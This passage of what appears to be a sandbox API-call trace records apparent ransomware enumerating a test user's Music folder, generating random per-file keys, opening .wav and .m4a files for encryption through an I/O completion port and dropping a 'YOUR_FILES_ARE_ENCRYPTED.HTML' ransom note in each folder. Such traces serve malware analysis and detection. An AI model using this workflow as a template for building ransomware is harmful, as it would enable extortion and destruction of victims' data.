param_1=0x4ebd47a, param_2="%02X" | out: param_1="0B") returned 2 [0168.059] wsprintfW (in: param_1=0x4ebd47e, param_2="%02X" | out: param_1="7F") returned 2 [0168.059] wsprintfW (in: param_1=0x4ebd482, param_2="%02X" | out: param_1="96") returned 2 [0168.059] wsprintfW (in: param_1=0x4ebd486, param_2="%02X" | out: param_1="08") returned 2 [0168.059] wsprintfW (in: param_1=0x4ebd48a, param_2="%02X" | out: param_1="8E") returned 2 [0168.059] wsprintfW (in: param_1=0x4ebd48e, param_2="%02X" | out: param_1="57") returned 2 [0168.059] wsprintfW (in: param_1=0x4ebd492, param_2="%02X" | out: param_1="7A") returned 2 [0168.059] wsprintfW (in: param_1=0x4ebd496, param_2="%02X" | out: param_1="D5") returned 2 [0168.059] wsprintfW (in: param_1=0x4ebd49a, param_2="%02X" | out: param_1="23") returned 2 [0168.060] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\RX0-yPNI7DvLWFXy1\\AXXYp8jRfDs2.wav" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\RX0-yPNI7DvLWFXy1\\AXXYp8jRfDs2.wav") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\RX0-yPNI7DvLWFXy1\\AXXYp8jRfDs2.wav" [0168.060] CreateIoCompletionPort (FileHandle=0x58c, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.060] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0168.063] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8160cc0, ftCreationTime.dwHighDateTime=0x1d7e35d, ftLastAccessTime.dwLowDateTime=0xa2f9ab80, ftLastAccessTime.dwHighDateTime=0x1d7e681, ftLastWriteTime.dwLowDateTime=0xa2f9ab80, ftLastWriteTime.dwHighDateTime=0x1d7e681, nFileSizeHigh=0x0, nFileSizeLow=0x16dad, dwReserved0=0xfec51fdf, dwReserved1=0xffffffff, cFileName="BA6j3JLUworAXTFvl0mV.wav", cAlternateFileName="BA6J3J~1.WAV")) returned 1 [0168.067] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\RX0-yPNI7DvLWFXy1\\BA6j3JLUworAXTFvl0mV.wav") returned 86 [0168.067] lstrcmpW (lpString1="BA6j3JLUworAXTFvl0mV.wav", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.067] PathFindExtensionW (pszPath="BA6j3JLUworAXTFvl0mV.wav") returned=".wav" [0168.067] lstrlenW (lpString=".wav") returned 4 [0168.067] PathFindExtensionW (pszPath="BA6j3JLUworAXTFvl0mV.wav") returned=".wav" [0168.067] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0168.067] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\RX0-yPNI7DvLWFXy1\\BA6j3JLUworAXTFvl0mV.wav" (normalized: "c:\\users\\5alr3u30d3\\music\\qemppb6d\\yg 2\\rx0-ypni7dvlwfxy1\\ba6j3jluworaxtfvl0mv.wav"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0168.068] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebd504 | out: lpFileSize=0x4ebd504*=93613) returned 1 [0168.068] GetProcessHeap () returned 0x270000 [0168.068] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0168.068] wsprintfW (in: param_1=0x4ebd41e, param_2="%02X" | out: param_1="33") returned 2 [0168.068] wsprintfW (in: param_1=0x4ebd422, param_2="%02X" | out: param_1="E8") returned 2 [0168.068] wsprintfW (in: param_1=0x4ebd426, param_2="%02X" | out: param_1="32") returned 2 [0168.068] wsprintfW (in: param_1=0x4ebd42a, param_2="%02X" | out: param_1="27") returned 2 [0168.068] wsprintfW (in: param_1=0x4ebd42e, param_2="%02X" | out: param_1="67") returned 2 [0168.068] wsprintfW (in: param_1=0x4ebd432, param_2="%02X" | out: param_1="85") returned 2 [0168.068] wsprintfW (in: param_1=0x4ebd436, param_2="%02X" | out: param_1="24") returned 2 [0168.069] wsprintfW (in: param_1=0x4ebd43a, param_2="%02X" | out: param_1="E8") returned 2 [0168.069] wsprintfW (in: param_1=0x4ebd43e, param_2="%02X" | out: param_1="99") returned 2 [0168.069] wsprintfW (in: param_1=0x4ebd442, param_2="%02X" | out: param_1="41") returned 2 [0168.069] wsprintfW (in: param_1=0x4ebd446, param_2="%02X" | out: param_1="25") returned 2 [0168.069] wsprintfW (in: param_1=0x4ebd44a, param_2="%02X" | out: param_1="0E") returned 2 [0168.069] wsprintfW (in: param_1=0x4ebd44e, param_2="%02X" | out: param_1="22") returned 2 [0168.069] wsprintfW (in: param_1=0x4ebd452, param_2="%02X" | out: param_1="93") returned 2 [0168.069] wsprintfW (in: param_1=0x4ebd456, param_2="%02X" | out: param_1="3E") returned 2 [0168.069] wsprintfW (in: param_1=0x4ebd45a, param_2="%02X" | out: param_1="86") returned 2 [0168.069] wsprintfW (in: param_1=0x4ebd45e, param_2="%02X" | out: param_1="76") returned 2 [0168.069] wsprintfW (in: param_1=0x4ebd462, param_2="%02X" | out: param_1="39") returned 2 [0168.069] wsprintfW (in: param_1=0x4ebd466, param_2="%02X" | out: param_1="85") returned 2 [0168.069] wsprintfW (in: param_1=0x4ebd46a, param_2="%02X" | out: param_1="F3") returned 2 [0168.069] wsprintfW (in: param_1=0x4ebd46e, param_2="%02X" | out: param_1="43") returned 2 [0168.069] wsprintfW (in: param_1=0x4ebd472, param_2="%02X" | out: param_1="C8") returned 2 [0168.069] wsprintfW (in: param_1=0x4ebd476, param_2="%02X" | out: param_1="60") returned 2 [0168.069] wsprintfW (in: param_1=0x4ebd47a, param_2="%02X" | out: param_1="07") returned 2 [0168.069] wsprintfW (in: param_1=0x4ebd47e, param_2="%02X" | out: param_1="46") returned 2 [0168.069] wsprintfW (in: param_1=0x4ebd482, param_2="%02X" | out: param_1="CD") returned 2 [0168.069] wsprintfW (in: param_1=0x4ebd486, param_2="%02X" | out: param_1="9F") returned 2 [0168.069] wsprintfW (in: param_1=0x4ebd48a, param_2="%02X" | out: param_1="03") returned 2 [0168.069] wsprintfW (in: param_1=0x4ebd48e, param_2="%02X" | out: param_1="4E") returned 2 [0168.069] wsprintfW (in: param_1=0x4ebd492, param_2="%02X" | out: param_1="7E") returned 2 [0168.069] wsprintfW (in: param_1=0x4ebd496, param_2="%02X" | out: param_1="84") returned 2 [0168.069] wsprintfW (in: param_1=0x4ebd49a, param_2="%02X" | out: param_1="45") returned 2 [0168.070] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\RX0-yPNI7DvLWFXy1\\BA6j3JLUworAXTFvl0mV.wav" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\RX0-yPNI7DvLWFXy1\\BA6j3JLUworAXTFvl0mV.wav") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\RX0-yPNI7DvLWFXy1\\BA6j3JLUworAXTFvl0mV.wav" [0168.070] CreateIoCompletionPort (FileHandle=0x58c, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.070] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0168.078] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbe994390, ftCreationTime.dwHighDateTime=0x1d7def8, ftLastAccessTime.dwLowDateTime=0x1a0e80e0, ftLastAccessTime.dwHighDateTime=0x1d7e33c, ftLastWriteTime.dwLowDateTime=0x1a0e80e0, ftLastWriteTime.dwHighDateTime=0x1d7e33c, nFileSizeHigh=0x0, nFileSizeLow=0x18f42, dwReserved0=0xfec51fdf, dwReserved1=0xffffffff, cFileName="RGmfEkC6DIb.wav", cAlternateFileName="RGMFEK~1.WAV")) returned 1 [0168.078] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\RX0-yPNI7DvLWFXy1\\RGmfEkC6DIb.wav") returned 77 [0168.078] lstrcmpW (lpString1="RGmfEkC6DIb.wav", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.078] PathFindExtensionW (pszPath="RGmfEkC6DIb.wav") returned=".wav" [0168.078] lstrlenW (lpString=".wav") returned 4 [0168.078] PathFindExtensionW (pszPath="RGmfEkC6DIb.wav") returned=".wav" [0168.078] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0168.078] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\RX0-yPNI7DvLWFXy1\\RGmfEkC6DIb.wav" (normalized: "c:\\users\\5alr3u30d3\\music\\qemppb6d\\yg 2\\rx0-ypni7dvlwfxy1\\rgmfekc6dib.wav"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0168.079] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebd504 | out: lpFileSize=0x4ebd504*=102210) returned 1 [0168.079] GetProcessHeap () returned 0x270000 [0168.079] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0168.080] wsprintfW (in: param_1=0x4ebd41e, param_2="%02X" | out: param_1="80") returned 2 [0168.080] wsprintfW (in: param_1=0x4ebd422, param_2="%02X" | out: param_1="AF") returned 2 [0168.080] wsprintfW (in: param_1=0x4ebd426, param_2="%02X" | out: param_1="20") returned 2 [0168.080] wsprintfW (in: param_1=0x4ebd42a, param_2="%02X" | out: param_1="C8") returned 2 [0168.080] wsprintfW (in: param_1=0x4ebd42e, param_2="%02X" | out: param_1="15") returned 2 [0168.080] wsprintfW (in: param_1=0x4ebd432, param_2="%02X" | out: param_1="AA") returned 2 [0168.080] wsprintfW (in: param_1=0x4ebd436, param_2="%02X" | out: param_1="E6") returned 2 [0168.080] wsprintfW (in: param_1=0x4ebd43a, param_2="%02X" | out: param_1="1E") returned 2 [0168.080] wsprintfW (in: param_1=0x4ebd43e, param_2="%02X" | out: param_1="0B") returned 2 [0168.080] wsprintfW (in: param_1=0x4ebd442, param_2="%02X" | out: param_1="B2") returned 2 [0168.080] wsprintfW (in: param_1=0x4ebd446, param_2="%02X" | out: param_1="9A") returned 2 [0168.080] wsprintfW (in: param_1=0x4ebd44a, param_2="%02X" | out: param_1="88") returned 2 [0168.080] wsprintfW (in: param_1=0x4ebd44e, param_2="%02X" | out: param_1="B1") returned 2 [0168.080] wsprintfW (in: param_1=0x4ebd452, param_2="%02X" | out: param_1="B5") returned 2 [0168.080] wsprintfW (in: param_1=0x4ebd456, param_2="%02X" | out: param_1="0D") returned 2 [0168.080] wsprintfW (in: param_1=0x4ebd45a, param_2="%02X" | out: param_1="D3") returned 2 [0168.080] wsprintfW (in: param_1=0x4ebd45e, param_2="%02X" | out: param_1="A1") returned 2 [0168.080] wsprintfW (in: param_1=0x4ebd462, param_2="%02X" | out: param_1="23") returned 2 [0168.080] wsprintfW (in: param_1=0x4ebd466, param_2="%02X" | out: param_1="FC") returned 2 [0168.080] wsprintfW (in: param_1=0x4ebd46a, param_2="%02X" | out: param_1="ED") returned 2 [0168.080] wsprintfW (in: param_1=0x4ebd46e, param_2="%02X" | out: param_1="D3") returned 2 [0168.080] wsprintfW (in: param_1=0x4ebd472, param_2="%02X" | out: param_1="1C") returned 2 [0168.080] wsprintfW (in: param_1=0x4ebd476, param_2="%02X" | out: param_1="80") returned 2 [0168.080] wsprintfW (in: param_1=0x4ebd47a, param_2="%02X" | out: param_1="3E") returned 2 [0168.080] wsprintfW (in: param_1=0x4ebd47e, param_2="%02X" | out: param_1="8D") returned 2 [0168.080] wsprintfW (in: param_1=0x4ebd482, param_2="%02X" | out: param_1="1E") returned 2 [0168.081] wsprintfW (in: param_1=0x4ebd486, param_2="%02X" | out: param_1="B9") returned 2 [0168.081] wsprintfW (in: param_1=0x4ebd48a, param_2="%02X" | out: param_1="F2") returned 2 [0168.081] wsprintfW (in: param_1=0x4ebd48e, param_2="%02X" | out: param_1="89") returned 2 [0168.081] wsprintfW (in: param_1=0x4ebd492, param_2="%02X" | out: param_1="D4") returned 2 [0168.081] wsprintfW (in: param_1=0x4ebd496, param_2="%02X" | out: param_1="4B") returned 2 [0168.081] wsprintfW (in: param_1=0x4ebd49a, param_2="%02X" | out: param_1="7E") returned 2 [0168.081] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\RX0-yPNI7DvLWFXy1\\RGmfEkC6DIb.wav" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\RX0-yPNI7DvLWFXy1\\RGmfEkC6DIb.wav") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\RX0-yPNI7DvLWFXy1\\RGmfEkC6DIb.wav" [0168.081] CreateIoCompletionPort (FileHandle=0x58c, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.081] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0168.083] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbe994390, ftCreationTime.dwHighDateTime=0x1d7def8, ftLastAccessTime.dwLowDateTime=0x1a0e80e0, ftLastAccessTime.dwHighDateTime=0x1d7e33c, ftLastWriteTime.dwLowDateTime=0x1a0e80e0, ftLastWriteTime.dwHighDateTime=0x1d7e33c, nFileSizeHigh=0x0, nFileSizeLow=0x18f42, dwReserved0=0xfec51fdf, dwReserved1=0xffffffff, cFileName="RGmfEkC6DIb.wav", cAlternateFileName="RGMFEK~1.WAV")) returned 0 [0168.083] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0168.083] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\RX0-yPNI7DvLWFXy1\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 91 [0168.083] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\RX0-yPNI7DvLWFXy1\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\music\\qemppb6d\\yg 2\\rx0-ypni7dvlwfxy1\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5e4 [0168.084] WriteFile (in: hFile=0x5e4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0168.086] CloseHandle (hObject=0x5e4) returned 1 [0168.086] GetProcessHeap () returned 0x270000 [0168.087] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76a0010 | out: hHeap=0x270000) returned 1 [0168.087] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5886cab0, ftCreationTime.dwHighDateTime=0x1d7dc1d, ftLastAccessTime.dwLowDateTime=0xb4a8b970, ftLastAccessTime.dwHighDateTime=0x1d7dd44, ftLastWriteTime.dwLowDateTime=0xb4a8b970, ftLastWriteTime.dwHighDateTime=0x1d7dd44, nFileSizeHigh=0x0, nFileSizeLow=0x13b9b, dwReserved0=0x867451, dwReserved1=0x0, cFileName="ud8n5jKw.m4a", cAlternateFileName="")) returned 1 [0168.087] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\ud8n5jKw.m4a") returned 56 [0168.087] lstrcmpW (lpString1="ud8n5jKw.m4a", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.087] PathFindExtensionW (pszPath="ud8n5jKw.m4a") returned=".m4a" [0168.087] lstrlenW (lpString=".m4a") returned 4 [0168.087] PathFindExtensionW (pszPath="ud8n5jKw.m4a") returned=".m4a" [0168.087] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0168.087] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\ud8n5jKw.m4a" (normalized: "c:\\users\\5alr3u30d3\\music\\qemppb6d\\yg 2\\ud8n5jkw.m4a"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5e4 [0168.088] GetFileSizeEx (in: hFile=0x5e4, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=80795) returned 1 [0168.088] GetProcessHeap () returned 0x270000 [0168.088] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x75e0048 [0168.092] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="39") returned 2 [0168.093] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="80") returned 2 [0168.093] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="C7") returned 2 [0168.093] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="6C") returned 2 [0168.093] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="3A") returned 2 [0168.093] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="3A") returned 2 [0168.093] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="46") returned 2 [0168.093] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="41") returned 2 [0168.093] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="14") returned 2 [0168.093] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="DC") returned 2 [0168.093] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="41") returned 2 [0168.093] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="E7") returned 2 [0168.093] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="8D") returned 2 [0168.093] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="38") returned 2 [0168.093] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="BA") returned 2 [0168.093] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="AB") returned 2 [0168.093] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="1E") returned 2 [0168.093] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="62") returned 2 [0168.093] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="92") returned 2 [0168.093] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="55") returned 2 [0168.093] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="37") returned 2 [0168.093] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="95") returned 2 [0168.093] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="01") returned 2 [0168.093] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="48") returned 2 [0168.093] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="69") returned 2 [0168.093] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="F4") returned 2 [0168.093] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="46") returned 2 [0168.093] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="8C") returned 2 [0168.094] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="62") returned 2 [0168.094] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="E4") returned 2 [0168.094] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="CF") returned 2 [0168.094] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="68") returned 2 [0168.094] lstrcpyW (in: lpString1=0x75f00fc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\ud8n5jKw.m4a" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\ud8n5jKw.m4a") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\ud8n5jKw.m4a" [0168.094] CreateIoCompletionPort (FileHandle=0x5e4, ExistingCompletionPort=0x3a0, CompletionKey=0x75e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.094] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x75e0048, lpOverlapped=0x75e0048) returned 1 [0168.094] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5886cab0, ftCreationTime.dwHighDateTime=0x1d7dc1d, ftLastAccessTime.dwLowDateTime=0xb4a8b970, ftLastAccessTime.dwHighDateTime=0x1d7dd44, ftLastWriteTime.dwLowDateTime=0xb4a8b970, ftLastWriteTime.dwHighDateTime=0x1d7dd44, nFileSizeHigh=0x0, nFileSizeLow=0x13b9b, dwReserved0=0x867451, dwReserved1=0x0, cFileName="ud8n5jKw.m4a", cAlternateFileName="")) returned 0 [0168.094] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0168.094] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 73 [0168.094] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\music\\qemppb6d\\yg 2\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a4 [0168.095] WriteFile (in: hFile=0x5a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0168.097] CloseHandle (hObject=0x5a4) returned 1 [0168.097] GetProcessHeap () returned 0x270000 [0168.098] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0168.098] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa51505b0, ftCreationTime.dwHighDateTime=0x1d7df13, ftLastAccessTime.dwLowDateTime=0x83f695a0, ftLastAccessTime.dwHighDateTime=0x1d7e5d1, ftLastWriteTime.dwLowDateTime=0x83f695a0, ftLastWriteTime.dwHighDateTime=0x1d7e5d1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfd6c27, dwReserved1=0x0, cFileName="yg 2", cAlternateFileName="YG2~1")) returned 0 [0168.098] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0168.098] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 68 [0168.098] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\music\\qemppb6d\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0168.099] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0168.101] CloseHandle (hObject=0x5ac) returned 1 [0168.101] GetProcessHeap () returned 0x270000 [0168.102] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74081a0 | out: hHeap=0x270000) returned 1 [0168.102] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7aa2beb0, ftCreationTime.dwHighDateTime=0x1d7df51, ftLastAccessTime.dwLowDateTime=0xb9e5e640, ftLastAccessTime.dwHighDateTime=0x1d7e00c, ftLastWriteTime.dwLowDateTime=0xb9e5e640, ftLastWriteTime.dwHighDateTime=0x1d7e00c, nFileSizeHigh=0x0, nFileSizeLow=0x15229, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="SkVxCvpKdtQjOiR8Ir9y.m4a", cAlternateFileName="SKVXCV~1.M4A")) returned 1 [0168.102] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\SkVxCvpKdtQjOiR8Ir9y.m4a") returned 54 [0168.102] lstrcmpW (lpString1="SkVxCvpKdtQjOiR8Ir9y.m4a", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.102] PathFindExtensionW (pszPath="SkVxCvpKdtQjOiR8Ir9y.m4a") returned=".m4a" [0168.102] lstrlenW (lpString=".m4a") returned 4 [0168.102] PathFindExtensionW (pszPath="SkVxCvpKdtQjOiR8Ir9y.m4a") returned=".m4a" [0168.102] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0168.102] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\SkVxCvpKdtQjOiR8Ir9y.m4a" (normalized: "c:\\users\\5alr3u30d3\\music\\skvxcvpkdtqjoir8ir9y.m4a"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0168.103] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=86569) returned 1 [0168.103] GetProcessHeap () returned 0x270000 [0168.103] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0168.104] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="D7") returned 2 [0168.104] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="C2") returned 2 [0168.104] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="D9") returned 2 [0168.104] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="BE") returned 2 [0168.104] wsprintfW (in: param_1=0x4ebdd52, 